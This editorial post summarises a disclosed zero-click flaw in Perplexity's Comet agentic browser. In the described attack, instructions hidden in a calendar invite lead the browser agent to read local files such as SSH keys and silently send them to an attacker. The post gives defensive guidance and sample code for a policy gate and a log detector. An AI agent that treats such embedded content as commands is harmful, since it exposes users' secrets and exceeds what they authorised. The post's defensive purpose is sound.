TL;DR: A zero-click flaw in Perplexity Comet can turn a routine calendar invite into local file access and silent exfiltration, exposing the limits of current agentic browser safeguards, according to Zenity Labs’ PerplexedBrowser disclosure. The trust boundary between user intent and untrusted input collapses once the browser agent can act autonomously on page content.
At a glance
What this is: PerplexedBrowser is a zero-click agentic browser flaw that can leak local files from a routine calendar invite by abusing autonomous execution.
Why it matters: It matters because IAM, NHI, and human access controls all assume users or systems approve sensitive actions before they happen, but agentic browsers can cross that boundary on their own.
👉 Read Zenity's analysis of the PerplexedBrowser agentic browser vulnerability
Context
Agentic browsers blur the line between a browser, an assistant, and a privileged runtime. In PerplexedBrowser, the core issue is not a classical browser bug alone, but the failure of trust boundaries between untrusted content and an autonomous agent that can interpret instructions and act on local resources.
That matters for identity governance because the browser is operating inside an authenticated user context while making its own execution decisions. When a calendar invite can trigger file access and exfiltration, existing browser controls, session assumptions, and approval models no longer describe the real risk surface.
Key questions
Q: How should security teams govern agentic browsers that can act on calendar invites?
A: They should treat the browser as a privileged identity with a narrow, explicitly approved action set. Calendar content, links, and embedded instructions must be assumed hostile until policy checks clear them. The key control is not user awareness after the fact, but hard pre-execution limits on file access, link following, and outbound data movement.
Q: What breaks when an AI browser can read local files inside a user session?
A: The normal separation between browsing activity and local data access breaks down. Secrets, tokens, and documents can be reached through an authenticated context that looks legitimate in logs, which makes exfiltration harder to distinguish from normal work. That is a session-abuse problem, not a simple web-content problem.
Q: How do you know if agentic browser guardrails are actually working?
A: They are working only if the agent is stopped before it can open local resources or send data externally from untrusted content. A useful signal is whether high-risk actions are blocked at policy time rather than merely detected in telemetry. If alerts fire after access, the control is too late to matter.
Q: Who is accountable when an autonomous browser exfiltrates sensitive data?
A: Accountability sits with the organisation operating the agent, because the browser was allowed to act inside a trusted user context without a strong authorization boundary. Governance teams should map responsibility across endpoint security, identity, and application owners, since the failure spans more than one control domain.
Technical breakdown
How a calendar invite becomes a file exfiltration path
Agentic browsers ingest content, infer intent, and then choose follow-on actions. In this case, attacker-controlled calendar content can be treated as task input rather than as untrusted data, which lets the browser agent navigate to local file resources and read them through the user's session. The exploit works because the system crosses from content interpretation into privileged action without a hard separation between the two. That is a boundary failure, not simply a bad click flow.
Practical implication: treat calendar and collaboration content as hostile inputs to autonomous browser agents and block direct file-system reach from those workflows.
Why autonomous execution changes the credential and session risk
Once an agent can act inside a logged-in browser session, the local file system becomes a shortcut to secrets, tokens, and authenticated artifacts. Files that are normally protected by user intent, context switching, or manual handling can be read and transmitted without a separate approval step. The result is a session-abuse pattern rather than a conventional malware pattern. Logs may show legitimate browser activity even when the user never approved the underlying data movement.
Practical implication: isolate agentic browser sessions from local secrets, developer tokens, and any file stores that would create immediate credential exposure.
Why detection alone fails when the agent has already committed
This class of flaw shows a familiar failure mode in autonomous systems: the system may recognise abnormal behaviour only after the workflow is already in motion. If the agent can parse instructions, decide to continue, and complete the action before a guardrail intervenes, then detection is late by design. The security model needs a stop condition that sits between intent recognition and execution, not a monitor that reports after exfiltration has begun.
Practical implication: add hard pre-execution policy checks for agent actions that touch local files, secrets, or external endpoints.
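The stop condition described in this section, a policy decision taken between intent recognition and execution, can be made concrete. The following is an added example (not code from Zenity, Perplexity or the NHI Mgmt Group) of a default-deny gate that an agent runtime would call before every proposed action. The action kinds, the provenance labels, the secret directories and the egress allow-list are assumptions constructed for the illustration; the point is that content-derived instructions, local-resource schemes, secret stores and unknown destinations are all refused before anything runs, and the plan halts at the first refusal.

```python
"""
Pre-execution policy gate for an agentic browser's proposed actions.

Added example, not code from Zenity, Perplexity or the NHI Mgmt Group.
The action kinds, the provenance labels, the secret directories and the
egress allow-list are assumptions constructed for the illustration.
"""
import posixpath
from dataclasses import dataclass
from pathlib import PurePosixPath
from urllib.parse import urlparse

# Where an instruction came from: typed by the human, or derived from
# content the agent read (a page, a calendar invite, an attachment).
USER = "user"
CONTENT = "content"

# URL schemes that give the agent reach into local resources (assumed list).
LOCAL_SCHEMES = {"file", "about", "chrome", "view-source"}

# Directories holding tokens and keys; reads here are denied for any origin.
SECRET_DIRS = [PurePosixPath(p) for p in (
    "/home/alice/.ssh", "/home/alice/.aws", "/home/alice/.config/gcloud")]

# Hosts the agent may transmit data to (constructed allow-list).
EGRESS_ALLOWLIST = {"calendar.example.com", "api.example.com"}


@dataclass(frozen=True)
class Action:
    kind: str      # "navigate", "read_file" or "send"
    target: str    # URL for navigate/send, filesystem path for read_file
    origin: str    # USER or CONTENT


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str


def _under_secret_dir(path: str) -> bool:
    """True if the normalised path (".." resolved) is inside a secret directory."""
    p = PurePosixPath(posixpath.normpath(path))
    return any(p == d or d in p.parents for d in SECRET_DIRS)


def evaluate(action: Action) -> Decision:
    """Default-deny policy decision taken before the action executes."""
    if action.kind == "navigate":
        url = urlparse(action.target)          # scheme is lower-cased by urlparse
        if url.scheme in LOCAL_SCHEMES:
            return Decision(False, "local resource reach via %s: URL" % url.scheme)
        if action.origin == CONTENT and url.hostname not in EGRESS_ALLOWLIST:
            return Decision(False, "content-derived link needs explicit user approval")
        return Decision(True, "navigation permitted")

    if action.kind == "read_file":
        if _under_secret_dir(action.target):
            return Decision(False, "path is inside a secret store")
        if action.origin == CONTENT:
            return Decision(False, "file read requested by untrusted content")
        return Decision(True, "file read permitted")

    if action.kind == "send":
        host = urlparse(action.target).hostname
        if action.origin == CONTENT:
            return Decision(False, "outbound data movement requested by untrusted content")
        if host not in EGRESS_ALLOWLIST:
            return Decision(False, "destination %r not on egress allow-list" % host)
        return Decision(True, "transmission permitted")

    return Decision(False, "unknown action kind %r" % action.kind)


def run_plan(plan):
    """Execute a plan only up to the first denied action.

    Returns (executed, blocked): the actions that passed the gate, and a
    (action, decision) pair for the first one stopped (None if all passed).
    """
    executed = []
    for action in plan:
        decision = evaluate(action)
        if not decision.allowed:
            return executed, (action, decision)
        executed.append(action)   # a real runtime would perform the action here
    return executed, None


# Constructed plan mirroring the invite-to-exfiltration narrative: the human
# opens the calendar, then invite text steers the agent towards a key file
# and an outbound upload.
SAMPLE_PLAN = [
    Action("navigate", "https://calendar.example.com/event/42", USER),
    Action("navigate", "file:///home/alice/.ssh/id_ed25519", CONTENT),
    Action("send", "https://collector.attacker.invalid/upload", CONTENT),
]

if __name__ == "__main__":
    done, stopped = run_plan(SAMPLE_PLAN)
    print("executed:", [a.target for a in done])
    if stopped:
        print("blocked:", stopped[0].target, "-", stopped[1].reason)
```

Two design choices matter here. Provenance travels with every action, so an instruction that originated in page or invite content can never unlock a file read or an outbound send, whatever the destination. And the secret-directory check normalises the path first, so a `..` segment cannot walk back into a key store.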
Threat narrative
Attacker objective: The attacker wants the browser agent to convert a normal productivity workflow into unauthorized access to local files and silent exfiltration of sensitive data.
- Entry occurs when attacker-controlled calendar or web content is presented to the agent as if it were routine user input.
- Credential access happens when the agent, acting inside the user’s session, reaches local file resources that contain secrets, tokens, or sensitive documents.
- Impact occurs when the agent silently sends the accessed data to attacker-controlled endpoints without explicit user approval.
Breaches seen in the wild
- Moltbook AI agent keys breach — the Moltbook breach exposed 1.5M AI agent keys.
- AI LLM hijack breach — attackers used stolen AWS access keys to hijack Anthropic LLM models on Bedrock.
Read our 52 NHI Breaches Analysis report for a comprehensive view of breaches impacting Non-Human Identities including AI Agents.
NHI Mgmt Group analysis
Intent recognition without hard boundaries is now a broken control premise. Agentic browsers do not just render content, they interpret it and then act. That means the old assumption that untrusted input stays separated from privileged execution no longer holds once the browser is autonomous. The implication is that security teams must stop treating content filtering as equivalent to execution control.
PerplexedBrowser is a session-abuse problem, not a browser convenience problem. The flaw works because the agent inherits a real authenticated context and can use it against local resources. That turns familiar browser activity into a privilege-bearing identity event, which is exactly where NHI governance principles need to be applied. The practitioner conclusion is that browser sessions with autonomous actions require identity-style containment, not only web security controls.
Autonomous browsers expose a named governance gap: user approval is no longer a reliable authorization boundary. The agent can continue after parsing a request, choose a workflow, and complete it before a human ever sees the consequence. This is a failure mode in the approval model itself, because the actor can progress through the task faster than the governance process can intervene. Practitioners must re-evaluate any control that assumes a human review window exists before sensitive access occurs.
Shadow AI and unmanaged agentic browsing create a broader control blind spot. If enterprise devices can run AI-powered browsers outside formal inventory and policy enforcement, then local file access and session tokens become hidden exposure points. The issue is not only one product family but the operating assumption that browser identity is passive. The practitioner conclusion is that unmanaged agentic tools should be treated as identity-bearing assets with explicit control boundaries.
Trust boundaries for autonomous agents should be framed as identity blast radius, not feature risk. Once an agent can interpret arbitrary content and touch local resources, every new workflow increases the reachable attack surface. That makes the governance question how far an agent can move inside a trusted session before it crosses into data exposure. The practitioner conclusion is to define blast-radius limits before deployment, not after a disclosure.
From our research:
- 80% of organisations report their AI agents have already performed actions beyond their intended scope, including accessing unauthorised systems (39%), inappropriately sharing sensitive data (31%), and revealing access credentials (23%), according to the AI Agents: The New Attack Surface report.
- Another finding from the same research shows only 52% of companies can track and audit the data their AI agents access, leaving 48% with a complete blind spot for compliance and breach investigation.
- For a broader breach lens, see 52 NHI Breaches Analysis for real-world cases where identity control gaps enabled exposure and lateral movement.
What this signals
Identity blast radius is now the right way to think about agentic browsers. Once a browser can interpret untrusted content and operate on local resources, the security question becomes how far that identity can move before a policy boundary stops it. Teams should inventory where AI-enabled browsers run, which local artifacts they can touch, and whether those sessions are isolated from secrets and developer workflows. The practical standard to compare against is the OWASP Agentic AI Top 10, especially the risks around tool misuse and agent hijacking.
Zenity’s disclosure is a warning that unmanaged agentic tools are becoming shadow AI endpoints with real data reach. In programmes that still treat browsers as passive clients, the control gap will widen as users adopt AI helpers faster than policy teams can classify them. The most effective next step is to define where autonomous browser use is allowed, where it is prohibited, and which data classes are out of bounds.
If your programme already uses NHI controls for service accounts and tokens, the same thinking needs to extend to agentic browser sessions. The operational shift is to govern the runtime context, not just the credential, because the browser can turn a legitimate session into an exfiltration path in seconds.
For practitioners
- Block autonomous file-system access from agentic browsers: Remove direct file:// reach and any equivalent local resource access from AI browsers used on managed endpoints. Keep agent workflows out of directories that contain developer secrets, exports, or personal data that would amplify exfiltration risk.
- Classify calendar and collaboration content as hostile input: Treat invites, embedded notes, and linked content as untrusted instructions when they are consumed by an autonomous browser. Apply policy checks before the agent can follow links, open attachments, or translate content into privileged actions.
- Separate agent sessions from high-value secrets: Use isolated browser profiles, constrained device contexts, and hard boundaries around token stores, SSH material, and password exports. The goal is to prevent a routine user task from becoming an immediate credential theft path.
- Enforce pre-execution controls, not post-execution alerts: Require the agent to pass a policy decision before any action that could read local files or transmit data externally. Alerting is still useful, but it cannot be the primary safeguard once the agent can complete the workflow in under a minute.
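The last item keeps alerting as a secondary control, and the "What breaks" answer above notes that each step of this abuse looks like legitimate browser activity in logs. What makes it detectable retrospectively is the sequence, not any single event: untrusted content ingested, a local resource read, then an egress to an unknown host, all within seconds. The following is an added example (not code from Zenity, Perplexity or the NHI Mgmt Group) of that correlation over a constructed agent action log; the log schema, field names, hosts and timestamps are assumptions, and a real agent runtime would have its own event format. The elapsed-time figure it reports is the practical argument for pre-execution controls: the whole chain completes well inside any human review window.

```python
"""
Retrospective detection of the invite -> local read -> egress chain in an
agent action log.

Added example, not code from Zenity, Perplexity or the NHI Mgmt Group. The
log schema, field names, hosts and timestamps are constructed for the
illustration; a real agent runtime would have its own event format.
"""
import json
from datetime import datetime
from urllib.parse import urlparse

# Content sources the agent should treat as hostile instructions (assumed).
UNTRUSTED_SOURCES = {"calendar_invite", "web_page", "attachment"}
# URL schemes that reach local resources (assumed).
LOCAL_SCHEMES = {"file"}
# Hosts where outbound data is expected (constructed allow-list).
KNOWN_EGRESS = {"calendar.example.com", "api.example.com"}

# Constructed JSON-lines log: session s1 is ordinary use, s2 is the abuse
# chain, s3 ingests an invite but never touches a local file.
SAMPLE_LOG = """\
{"ts": "2026-03-05T09:58:00+00:00", "session": "s1", "event": "navigate", "target": "https://calendar.example.com/"}
{"ts": "2026-03-05T09:58:20+00:00", "session": "s1", "event": "egress", "target": "https://api.example.com/sync"}
{"ts": "2026-03-05T10:00:00+00:00", "session": "s2", "event": "ingest", "source": "calendar_invite", "target": "invite-7731"}
{"ts": "2026-03-05T10:00:04+00:00", "session": "s2", "event": "navigate", "target": "file:///home/alice/.ssh/id_ed25519"}
{"ts": "2026-03-05T10:00:09+00:00", "session": "s2", "event": "egress", "target": "https://collector.attacker.invalid/upload"}
{"ts": "2026-03-05T10:05:00+00:00", "session": "s3", "event": "ingest", "source": "calendar_invite", "target": "invite-7732"}
{"ts": "2026-03-05T10:05:03+00:00", "session": "s3", "event": "egress", "target": "https://api.example.com/sync"}
"""


def parse_log(text):
    """Parse JSON lines into event dicts with a datetime 'ts', oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def _is_local(target):
    return urlparse(target).scheme in LOCAL_SCHEMES


def _is_unknown_egress(target):
    return urlparse(target).hostname not in KNOWN_EGRESS


def find_exfil_chains(events, window_s=120):
    """Return one finding per session that moved from an untrusted ingest to
    a local resource read and then to an unknown external host, all inside
    window_s seconds. Each event on its own looks like normal browsing."""
    state = {}      # session -> {"ingest": event or None, "read": event or None}
    findings = []
    for ev in events:
        s = state.setdefault(ev["session"], {"ingest": None, "read": None})
        kind, target = ev["event"], ev.get("target", "")
        if kind == "ingest" and ev.get("source") in UNTRUSTED_SOURCES:
            s["ingest"], s["read"] = ev, None            # a new chain starts here
        elif kind in ("navigate", "read") and _is_local(target) and s["ingest"]:
            s["read"] = ev                               # local reach after hostile input
        elif kind == "egress" and s["read"] and _is_unknown_egress(target):
            elapsed = (ev["ts"] - s["ingest"]["ts"]).total_seconds()
            if elapsed <= window_s:
                findings.append({
                    "session": ev["session"],
                    "ingest": s["ingest"]["target"],
                    "local_read": s["read"]["target"],
                    "egress_host": urlparse(target).hostname,
                    "elapsed_s": elapsed,
                })
            s["ingest"], s["read"] = None, None          # chain consumed
    return findings


if __name__ == "__main__":
    for f in find_exfil_chains(parse_log(SAMPLE_LOG)):
        print("session %(session)s: %(ingest)s -> %(local_read)s -> "
              "%(egress_host)s in %(elapsed_s).0fs" % f)
```

Run on the constructed log, only session s2 is flagged, with nine seconds between the invite being read and the upload leaving. Session s3 shows why the chain matters: an invite followed by an egress to a known host is ordinary calendar sync and produces no finding.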
Key takeaways
- Agentic browsers turn untrusted content into privileged execution, which breaks the old assumption that browsing and local file access are separate control planes.
- The disclosed flaw shows how quickly a routine calendar invite can become a file exfiltration path when the browser agent inherits a trusted session.
- Teams need hard pre-execution limits, session isolation, and blast-radius controls for autonomous browser use, because post-execution detection is too late.
Standards & Framework Alignment
This section maps relevant standards and security frameworks to the operational risks and controls described in this guidance.
The OWASP Agentic AI Top 10 addresses the attack and risk surface, while NIST AI RMF and NIST CSF 2.0 set the governance and control requirements practitioners need to meet.
| Framework | Control / Reference | Relevance |
|---|---|---|
| OWASP Agentic AI Top 10 | | Agentic browser intent hijacking maps directly to agentic application abuse. |
| NIST AI RMF | | Autonomous browser behaviour requires governance over runtime decisions and accountability. |
| NIST CSF 2.0 | PR.AA-05 | Identity assurance and access boundary failures drive the exposure here. |
Limit what autonomous sessions can access and verify that controls prevent local data exposure.
Key terms
- Agentic Browser: A browser that can interpret content and take actions on behalf of a user without each step being manually clicked. In security terms, it becomes a privileged runtime with access to sessions, local resources, and connected tools, which means governance must cover both what it can see and what it can do.
- Trust Boundary: The separation that keeps untrusted input from becoming privileged action. In agentic systems, that boundary is often weaker because content can be read, interpreted, and executed within the same workflow, so the boundary has to be enforced by policy and runtime controls rather than by user expectation.
- Identity Blast Radius: The amount of damage an identity can cause before a control stops it. For agentic browsers, blast radius includes local file access, session abuse, and external data movement, because the browser can act quickly enough that traditional review cycles are already too late.
- Shadow AI: AI tools or agents running in an environment without formal governance, inventory, or policy coverage. In this context, unmanaged agentic browsers become shadow AI endpoints because they can reach local data and authenticated sessions without being accounted for in identity or endpoint controls.
Deepen your knowledge
Agentic browser trust boundaries and runtime containment are core topics in our NHI Foundation Level course, the industry's only accredited NHI security programme. If you are working from the same starting point, it is worth exploring.
This post draws on content published by Zenity: PerplexedBrowser and the risk of handing local files to an attacker through an agentic browser. Read the original.
Published by the NHIMG editorial team on 2026-03-05.
NHI Mgmt Group — the independent authority on Non-Human Identity, IAM, and Agentic AI security. nhimg.org